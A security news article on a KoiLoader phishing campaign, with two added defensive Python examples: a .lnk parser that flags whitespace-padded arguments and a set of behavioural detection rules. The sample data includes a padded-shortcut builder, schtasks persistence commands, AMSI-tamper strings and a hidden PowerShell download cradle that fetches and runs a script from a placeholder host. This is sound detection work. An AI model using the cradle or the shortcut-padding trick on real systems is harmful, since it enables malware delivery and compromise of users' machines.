Aman Mishra
2025-04-01 16:42:00
gbhackers.com
Cybersecurity experts at eSentire’s Threat Response Unit (TRU) uncovered a sophisticated malware campaign leveraging KoiLoader, a malicious loader designed to deploy information-stealing payloads.
This campaign utilized PowerShell scripts and obfuscation techniques to bypass security measures and infect systems.
The investigation revealed a multi-stage infection chain, highlighting the evolving tactics of cybercriminals.
Infection Chain and Delivery Mechanism
The attack begins with phishing emails containing links to zip files named “chase_statement_march.zip.”
Inside these zip files, victims encounter shortcut files (.lnk) that abuse a known Windows shortcut-handling bug (ZDI-CAN-25373): the shortcut’s command-line arguments are padded with whitespace so that the real command line is not visible in the file’s Properties dialog.
Upon execution, the shortcut file downloads two JScript files, g1siy9wuiiyxnk.js and i7z1x5npc.js, to the victim’s system.
These scripts handle the malware’s persistence and payload delivery through scheduled tasks created with the LOLBin schtasks.exe.
The JScript files serve distinct purposes: g1siy9wuiiyxnk.js deletes the initial scheduled task and executes i7z1x5npc.js, while the latter retrieves PowerShell scripts from remote URLs.
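The padding trick is easy to check for on disk, because the arguments live in a fixed StringData field of the .lnk file and a legitimate shortcut never starts its Target field with a long run of whitespace or embeds carriage returns, line feeds or vertical tabs in it. The following Python is an added example, not code from eSentire’s report or from the campaign: it parses the MS-SHLLINK header, skips the optional LinkTargetIDList and LinkInfo blocks, reads the StringData fields and flags padded arguments. The two shortcuts it inspects are constructed inside the script; the padded command line and the 32-character threshold are placeholders chosen for illustration, not the campaign’s real values.

```python
"""Parse a Windows .lnk and flag whitespace-padded COMMAND_LINE_ARGUMENTS.

Added example, not code from the eSentire report. The sample shortcuts are
built in-process; the padded command line is a placeholder, not the
campaign's real one.
"""
import struct

# LinkFlags bits in the ShellLinkHeader (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
WHITESPACE = " \t\r\n\x0b\x0c"
PAD_THRESHOLD = 32  # assumed cut-off: normal shortcuts carry no leading padding at all


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (None where the flag says the field is absent)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) precedes the list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + count * width]
        pos += 2 + count * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")

    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        fields[key] = read_string() if flags & flag else None  # fixed order per spec 2.4
    return fields


def analyze_arguments(arguments):
    """Flag the ZDI-CAN-25373 pattern: a run of whitespace in front of the real arguments."""
    if not arguments:
        return {"leading_padding": 0, "embedded_control_ws": False,
                "hidden_command": "", "suspicious": False}
    stripped = arguments.lstrip(WHITESPACE)
    leading = len(arguments) - len(stripped)
    control = any(c in "\r\n\x0b\x0c" for c in arguments)  # never legitimate in a Target field
    return {"leading_padding": leading, "embedded_control_ws": control,
            "hidden_command": stripped, "suspicious": leading >= PAD_THRESHOLD or control}


def scan(data: bytes) -> dict:
    """Parse one .lnk blob and return the padding verdict plus the shortcut target."""
    fields = parse_lnk(data)
    verdict = analyze_arguments(fields["arguments"])
    verdict["target"] = fields["relative_path"]
    return verdict


def build_lnk(relative_path: str, arguments: str, id_list: bytes = b"") -> bytes:
    """Construct a minimal Unicode .lnk (test fixture only, not a real dropper)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE | (HAS_LINK_TARGET_ID_LIST if id_list else 0)
    header = (struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0x80)                        # FILE_ATTRIBUTE_NORMAL
              + b"\x00" * 24                                   # three zero FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, 7, 0, 0, 0, 0))  # FileSize, IconIndex, SW_SHOWMINNOACTIVE, HotKey, Reserved1-3
    body = struct.pack("<H", len(id_list)) + id_list if id_list else b""

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + body + string_data(relative_path) + string_data(arguments)


# Constructed fixtures: a normal shortcut and one padded in the ZDI-CAN-25373 style.
BENIGN_LNK = build_lnk("..\\..\\Windows\\System32\\notepad.exe", "C:\\docs\\readme.txt")
PADDED_LNK = build_lnk("..\\..\\Windows\\System32\\cmd.exe",
                       " " * 200 + "\x0b\n\r\t" * 25 + "/c start /min wscript.exe i7z1x5npc.js",
                       id_list=b"\x00\x00")  # empty IDList: just the TerminalID

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_LNK), ("padded", PADDED_LNK)):
        print(name, scan(blob))
```

Run it over the contents of an e-mail attachment quarantine or a mail-gateway sandbox; the `hidden_command` field gives the analyst the command line the Properties dialog would have hidden. Shortcuts with a non-Unicode StringData section and shortcuts carrying an IDList or LinkInfo block are handled, but ExtraData blocks after the strings are ignored because the check does not need them.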
According to the report, these scripts disable security features such as the Anti-Malware Scan Interface (AMSI) and download the KoiLoader payload.
The malware ultimately executes shellcode via the CreateThread API, initiating its malicious operations.
KoiLoader’s Multi-Stage Execution
KoiLoader operates in two primary stages.
The first stage resolves the Windows APIs it needs, such as FindResourceW and LoadResource, by hash rather than by name, then uses them to locate the encrypted payloads stored in the PE file’s resources.
These payloads are decrypted using XOR routines and executed in memory.
The second stage focuses on evasion and payload delivery.
It checks for virtual machine environments, security researcher tools, and sandbox attributes to avoid detection.
Additionally, it ensures the malware runs exclusively on non-Russian systems by verifying language settings.
Once evasion checks are passed, KoiLoader establishes persistence through scheduled tasks and creates mutexes based on the victim machine’s volume serial number to prevent duplicate instances.
It then downloads and executes KoiStealer, an advanced information-stealing malware written in C#.
KoiStealer extracts sensitive data such as machine GUIDs, usernames, OS versions, and domain information before communicating with Command-and-Control (C2) servers.
KoiLoader employs HTTP POST requests for C2 communication.
The initial request includes the victim machine’s GUID, campaign-specific build ID, and an X25519 public key for encrypted data exchange.
Subsequent requests retrieve commands encoded as single characters, enabling actions such as script execution via PowerShell or Command Prompt, process injection into explorer.exe or certutil.exe, and dynamic DLL loading.
To counter threats like KoiLoader, eSentire recommends disabling wscript.exe via AppLocker or Windows Defender Application Control (WDAC).
Organizations should implement behavior-based detection mechanisms alongside robust phishing awareness training programs to mitigate social engineering risks.
Deploying Next-Gen Antivirus (NGAV) or Endpoint Detection and Response (EDR) solutions is critical for detecting and containing advanced threats.
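The chain described above leaves a distinctive sequence in process-creation telemetry: schtasks.exe creating a task that runs a script host, the script host deleting that task again, wscript.exe spawning a hidden PowerShell with a download cradle, and PowerShell command lines that reference AMSI internals. The following Python is an added example of the behaviour-based detection eSentire recommends, not eSentire’s own detection content: it runs a handful of rules over constructed process-creation events in the shape of a Sysmon Event ID 1 record and raises a chain alert when several distinct rules fire. The task names, paths, script names other than the two the report mentions, and the 203.0.113.5 address are placeholders.

```python
"""Behavioural rules for the KoiLoader delivery chain over process-creation events.

Added example, not eSentire's detection logic. EVENTS is a constructed sample in
the shape of Sysmon Event ID 1 (parent image, image, command line); names and the
203.0.113.5 address are placeholders.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def _base(image: str) -> str:
    """Lower-cased file name of an image path (handles both slash styles)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Return the names of every rule the event matches (empty list for benign)."""
    image, parent = _base(event["image"]), _base(event["parent_image"])
    cmd = event["command_line"].lower()
    hits = []
    # Persistence via schtasks.exe whose action is a script host or a .js file
    if image == "schtasks.exe" and "/create" in cmd and re.search(r"wscript\.exe|cscript\.exe|\.js\b", cmd):
        hits.append("schtasks_creates_script_host_task")
    # The first JScript removes the task that launched it
    if image == "schtasks.exe" and "/delete" in cmd and parent in SCRIPT_HOSTS:
        hits.append("script_host_deletes_scheduled_task")
    # JScript handing off to PowerShell
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_powershell")
    # Strings that only appear when a script tampers with AMSI
    if image in POWERSHELL and re.search(r"amsiutils|amsiinitfailed|amsiscanbuffer", cmd):
        hits.append("powershell_amsi_tamper_string")
    # Hidden window plus a download cradle
    if image in POWERSHELL and re.search(r"-w(indowstyle)?\s+hidden", cmd) and \
            re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", cmd):
        hits.append("hidden_powershell_download_cradle")
    return hits


def triage(events: list) -> dict:
    """Evaluate every event; flag a chain when three or more distinct rules fire."""
    findings = [(i, match_rules(e)) for i, e in enumerate(events)]
    fired = sorted({rule for _, hits in findings for rule in hits})
    return {"findings": findings, "distinct_rules": fired, "chain_suspected": len(fired) >= 3}


# Constructed sample: four stages of the chain followed by two benign events.
EVENTS = [
    {"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /create /sc minute /mo 1 /tn "Update" '
                     '/tr "wscript.exe C:\\Users\\victim\\AppData\\Local\\Temp\\g1siy9wuiiyxnk.js" /f'},
    {"parent_image": "C:\\Windows\\System32\\wscript.exe", "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /delete /tn "Update" /f'},
    {"parent_image": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.5/s1.ps1')\""},
    {"parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": 'powershell.exe -ep bypass -c "... amsiInitFailed ..."'},  # truncated placeholder
    {"parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\victim\\Documents"},
    {"parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\schtasks.exe",
     "command_line": 'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\\Tools\\backup.exe" /st 02:00'},
]

if __name__ == "__main__":
    result = triage(EVENTS)
    for index, hits in result["findings"]:
        print(index, hits or "-")
    print("chain suspected:", result["chain_suspected"])
```

Each rule on its own will fire on some legitimate administration (a backup task that runs a .js, a hidden PowerShell launched by an RMM agent), which is why the chain score counts distinct rules rather than alerting on the first hit; the AMSI-string rule and the task-deletion-by-script-host rule are the two with the lowest benign rate and are the ones to page on individually.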
This discovery underscores the importance of proactive threat hunting and advanced cybersecurity measures in combating modern malware campaigns.